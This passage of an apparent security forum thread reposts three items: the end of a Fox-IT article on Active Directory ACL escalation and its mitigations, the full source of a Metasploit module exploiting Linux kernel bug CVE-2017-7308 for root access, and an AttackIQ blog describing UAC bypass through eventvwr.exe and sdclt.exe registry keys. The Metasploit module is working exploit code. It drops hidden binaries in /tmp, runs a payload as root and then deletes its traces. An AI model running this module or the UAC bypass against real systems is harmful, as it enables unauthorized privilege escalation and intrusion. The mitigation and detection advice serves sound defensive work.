authentication with NTLM. The 404 error here is expected as ntlmrelayx.py serves a 404 page if the relaying attack is complete It should be noted that relaying attacks against LDAP are possible in the default configuration of Active Directory, since LDAP signing, which partially mitigates this attack, is disabled by default. Even if LDAP signing is enabled, it is still possible to relay to LDAPS (LDAP over SSL/TLS) since LDAPS is considered a signed channel. The only mitigation for this is enabling channel binding for LDAP in the registry. To get the new features in ntlmrelayx, simply update to the latest version of impacket from GitHub: https://github.com/CoreSecurity/impacket Recommendation As for mitigation, Fox-IT has a few recommendations. Remove dangerous ACLs Check for dangerous ACLs with tools such as Bloodhound. 3 Bloodhound can make an export of all ACLs in the domain which helps identifying dangerous ACLs. Remove writeDACL permission for Exchange Enterprise Servers Remove the writeDACL permission for Exchange Enterprise Servers. For more information see the following technet article: https://technet.microsoft.com/en-us/library/ee428169(v=exchg.80).aspx Monitor security groups Monitor (the membership of) security groups that can have a high impact on the domain, such as the Exchange Trusted Subsystem and the Exchange Windows Permissions. Audit and monitor changes to the ACL. Audit changes to the ACL of the domain. If not done already, it may be necessary to modify the domain controller policy. More information about this can be found on the following TechNet article: https://blogs.technet.microsoft.com/canitpro/2017/03/29/step-by-step-enabling-advanced-security-audit-policy-via-ds-access/ When the ACL of the domain object is modified, an event will be created with event ID 5136. The Windows event log can be queried with PowerShell, so here is a one-liner to get all events from the Security event log with ID 5136: 1 Get-WinEvent -FilterHashtable @{logname='security'; id=5136} This event contains the account name and the ACL in a Security Descriptor Definition Language (SDDL) format. Since this is unreadable for humans, there is a PowerShell cmdlet in Windows 10, ConvertFrom-SDDL4, which converts the SDDL string into a more readable ACL object. If the server runs Windows Server 2016 as operating system, it is also possible to see the original and modified descriptors. For more information: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4715 With this information you should be able to start an investigation to discover what was modified, when that happened and the reason behind that. References [1] https://technet.microsoft.com/en-us/library/ee681663.aspx [2] https://technet.microsoft.com/en-us/library/ff405676.aspx [3] https://github.com/BloodHoundAD/SharpHound [4] https://docs.microsoft.com/en-us/powershell/module/Microsoft.powershell.utility/convertfrom-sddlstring Sursa: https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/
      • 1
      • Upvote
  24. AF_PACKET packet_set_ring Privilege Escalation Posted May 17, 2018 Authored by Brendan Coles, Andrey Konovalov | Site metasploit.com This Metasploit module exploits a heap-out-of-bounds write in the packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel to execute code as root (CVE-2017-7308). The bug was initially introduced in 2011 and patched in version 4.10.6, potentially affecting a large number of kernels; however this exploit targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46, including Linux distros based on Ubuntu Xenial, such as Linux Mint. The target system must have unprivileged user namespaces enabled and two or more CPU cores. Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation may crash the kernel. This Metasploit module has been tested successfully on Linux Mint 18 (x86_64) with kernel versions: 4.8.0-34-generic; 4.8.0-36-generic; 4.8.0-39-generic; 4.8.0-41-generic; 4.8.0-42-generic; 4.8.0-44-generic; 4.8.0-45-generic. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Kernel include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'AF_PACKET packet_set_ring Privilege Escalation', 'Description' => %q{ This module exploits a heap-out-of-bounds write in the packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel to execute code as root (CVE-2017-7308). The bug was initially introduced in 2011 and patched in version 4.10.6, potentially affecting a large number of kernels; however this exploit targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46, including Linux distros based on Ubuntu Xenial, such as Linux Mint. The target system must have unprivileged user namespaces enabled and two or more CPU cores. Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation may crash the kernel. This module has been tested successfully on Linux Mint 18 (x86_64) with kernel versions: 4.8.0-34-generic; 4.8.0-36-generic; 4.8.0-39-generic; 4.8.0-41-generic; 4.8.0-42-generic; 4.8.0-44-generic; 4.8.0-45-generic. }, 'License' => MSF_LICENSE, 'Author' => [ 'Andrey Konovalov', # Discovery and C exploit 'Brendan Coles' # Metasploit ], 'DisclosureDate' => 'Mar 29 2017', 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'Privileged' => true, 'References' => [ [ 'EDB', '41994' ], [ 'CVE', '2017-7308' ], [ 'BID', '97234' ], [ 'URL', 'https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html' ], [ 'URL', 'https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308' ], [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7308.html', ], [ 'URL', 'https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c' ], [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/cve-2017-7308/CVE-2017-7308/poc.c' ] ], 'DefaultTarget' => 0)) register_options [ OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]), OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), ] end def base_dir datastore['WritableDir'].to_s end def upload(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." write_file path, data end def upload_and_chmodx(path, data) upload path, data cmd_exec "chmod +x '#{path}'" end def upload_and_compile(path, data) upload "#{path}.c", data gcc_cmd = "gcc -o #{path} #{path}.c" if session.type.eql? 'shell' gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}" end output = cmd_exec gcc_cmd unless output.blank? print_error output fail_with Failure::Unknown, "#{path}.c failed to compile" end cmd_exec "chmod +x #{path}" end def exploit_data(file) path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-7308', file fd = ::File.open path, 'rb' data = fd.read fd.stat.size fd.close data end def live_compile? return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') if has_gcc? vprint_good 'gcc is installed' return true end unless datastore['COMPILE'].eql? 'Auto' fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' end end def check version = kernel_release unless version =~ /^4\.8\.0-(34|36|39|41|42|44|45)-generic/ vprint_error "Linux kernel version #{version} is not vulnerable" return CheckCode::Safe end vprint_good "Linux kernel version #{version} is vulnerable" arch = kernel_hardware unless arch.include? 'x86_64' vprint_error "System architecture #{arch} is not supported" return CheckCode::Safe end vprint_good "System architecture #{arch} is supported" cores = get_cpu_info[:cores].to_i min_required_cores = 2 unless cores >= min_required_cores vprint_error "System has less than #{min_required_cores} CPU cores" return CheckCode::Safe end vprint_good "System has #{cores} CPU cores" unless userns_enabled? vprint_error 'Unprivileged user namespaces are not permitted' return CheckCode::Safe end vprint_good 'Unprivileged user namespaces are permitted' if kptr_restrict? && dmesg_restrict? vprint_error 'Both kernel.kptr_restrict and kernel.dmesg_destrict are enabled. KASLR bypass will fail.' return CheckCode::Safe end CheckCode::Appears end def exploit if check != CheckCode::Appears fail_with Failure::NotVulnerable, 'Target is not vulnerable' end if is_root? fail_with Failure::BadConfig, 'Session already has root privileges' end unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true' fail_with Failure::BadConfig, "#{base_dir} is not writable" end # Upload exploit executable executable_name = ".#{rand_text_alphanumeric rand(5..10)}" executable_path = "#{base_dir}/#{executable_name}" if live_compile? vprint_status 'Live compiling exploit on system...' upload_and_compile executable_path, exploit_data('poc.c') rm_f "#{executable_path}.c" else vprint_status 'Dropping pre-compiled exploit on system...' upload_and_chmodx executable_path, exploit_data('exploit') end # Upload payload executable payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}" upload_and_chmodx payload_path, generate_payload_exe # Launch exploit print_status 'Launching exploit...' output = cmd_exec "#{executable_path} #{payload_path}" output.each_line { |line| vprint_status line.chomp } print_status 'Deleting executable...' rm_f executable_path Rex.sleep 5 print_status 'Deleting payload...' rm_f payload_path end end Sursa: https://packetstormsecurity.com/files/147685
      • 1
      • Upvote
  25. Bypassing UAC using Registry Keys Category: Blog Welcome to the first of a new series of blogs we’ll be publishing with information about the scenarios we write for our platform. Our intention is to provide information about security threats with enough technical data to satisfy those of you that are curious and want to understand the inner workings of the threat techniques we implement. This series of posts are not meant to be the latest and greatest of our creations, just some details about popular scenarios in our library that we think might be of some interest for the people out there. Some of these will be kept high level and in others, we will go into greater technical details. We’ll always try to be as clear as possible on how we implement our philosophy "Think Bad, Do Good" by creating techniques that mimic the same TTPs followed by threat actors while keeping things safe for our customers Without more delay, welcome to the first post in this series. User Account Control (UAC) is a Windows feature that helps to prevent unauthorized changes to the system. This blog will show how a threat actor can silently execute privileged actions that modify the system while bypassing this security control. UAC has been present since Windows Vista and Windows Server 2008 with the goal to make the user aware when relevant system changes are triggered. It works by showing a popup window which asks for user interaction in order to accept some requested system changes, specifying which program name and publisher that are trying to carry out these changes. Also, the rest of the screen is usually dimmed to make the users more aware that this popup is really important, so they should pay attention. This feature is very helpful to users so they can discern the relevance of the system changes that they perform, but also can be helpful in detecting when another application or malware is trying to modify the system. Bypassing the UAC is a well known attack technique, which is categorized as Defense Evasion and Privilege Escalation techniques on the MITRE ATT&CK matrix. Technical details Since UAC is a security measure that can prevent malware, unwanted users or applications from changing relevant system configurations, threat actors are always looking for new ways to bypass UAC with the goal of performing privileged system changes without alerting the legitimate user. Different methods to bypass UAC exist, but this blog post is focused on registry modification techniques. The chosen technique relies on modifying the registry key for a specific system utility application, which privileges are auto-elevated by design, and the ability to execute other applications and give them privileges. Three parameters are necessary to execute this technique. Two of them are directly related to the bypass technique, and the last one is the target command to execute with privileges while bypassing UAC: Privileged application that will trigger the target application Registry key read by this privileged application which content should be a path of a binary that will be tried to execute Program path of the binary that will be silently executed by using the UAC bypass technique For example, the UAC Bypass technique that we will explain for Windows 7 takes advantage of the eventvwr.exe application. This privileged application works like a shortcut to the Microsoft Management Console (MMC). When eventvwr.exe starts, it will check if a specific binary is used to provide the functionality of the MMC snap-in for event viewer. To do that it looks for the specific binary location at the registry key “HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command”. Then it executes the binary at this path if it exists. Otherwise the default MMC snap-in for the windows event viewer will be loaded. The content of this registry key is the one that can be used to execute binaries while bypassing UAC. Due to Windows updates and security fixes, the privileged application and the registry key can be different for distinct Windows versions. Since there is not a bypass technique that shares the same privileged application and registry key at the time of this writing, we will show parameters that are valid for Windows 7. Other parameters are valid for Windows 10. Now, let’s demonstrate how these techniques work for both, one at a time. The Windows 7 technique is based on the following parameters: Auto-elevated privileged application: eventvwr.exe Registry key with path to execute: HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command To replicate this technique, the first step is to modify the registry key with the target application to execute. In this case we have chosen “C:\Windows\System32\cmd.exe”: Now that the registry key has been set, executing the eventvwr.exe process will execute the content of this registry key instead of loading itself: Finally it is possible to check that the new spawned process is running with High Integrity, which allows the new process to access to several privileged and protected system resources: The Windows 10 technique has the same parameter types, but with different values: Auto-elevated privileged application: sdclt.exe Registry key with path to execute: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe The first step is to modify the registry key as in the previous technique. We have chosen “C:\Windows\System32\cmd.exe” as the target application again: Once the registry key has been set, the next step is to execute “sdclt.exe”. This process will start the command line application instead of loading itself, which is the same behaviour seen in the Windows 7 technique: Finally we can check that the integrity level of the new spawned process is High, just as expected: Our research team is working on writing scenarios that are capable of testing if there are security controls preventing this kind of attack, in addition to many other different attacks used by threat actors. This is achieved by using AttackIQ scenarios which can be very specific, such as this one, or they can be as generic as needed to modify user provided registry keys. With these generic scenarios everybody is able to test any kind of attack based on registry modifications.There are also many other generic scenarios such as executing system commands, modifying files, exfiltrating files, discovering network assets, using different persistence techniques, etc. Mitigations Since both techniques rely on the same principle, the mitigation for them is also the same. It is as simple as setting the UAC level to Always Notify. A different protection approach can be used for those environments where it is not desirable to set the UAC level to Always Notify (however, having a different level is not recommended from the system’s security perspective). This approach consists in monitor and prevent registry changes on the following registry keys: HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe Along with these mitigations, it is also recommended to use unprivileged accounts whenever it is possible. Sursa: https://attackiq.com/blog/2018/05/14/bypassing-uac-using-registry-keys/
      • 1
      • Upvote
×
×
  • Create New...